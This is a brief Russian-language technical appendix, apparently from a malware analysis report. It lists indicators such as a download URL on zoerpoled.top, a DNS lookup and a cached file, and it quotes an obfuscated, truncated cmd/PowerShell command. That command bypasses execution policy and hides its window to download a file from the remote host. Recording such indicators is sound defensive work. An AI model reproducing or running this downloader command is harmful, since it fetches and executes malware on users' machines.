Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWERsHELL.ExE^ -^EXECu^t^ioN^PO^lIC^y^ B^YPAsS -N^OPR^OFILE^ ^-^wI^N^do^w^s^Tyle HiDDEn (n^eW-ob^JEct^ ^SY^stEM.n^e^T^.WEBCLi^ENt^).^D^o^wN^l^oaD^fiLE(^'http://www.zoerpol...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\ea09503g\config14[1].txt
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "p^oWERsHELL.ExE^ -^EXECu^t^ioN^PO^lIC^y^ B^YPAsS -N^OPR^OFILE^ ^-^wI^N^do^w^s^Tyle HiDDEn (n^eW-ob^JEct^ ^SY^stEM.n^e^T^.WEBCLi^ENt^).^D^o^wN^l^oaD^fiLE(^'http://www.zoerpol... (со скрытым окном)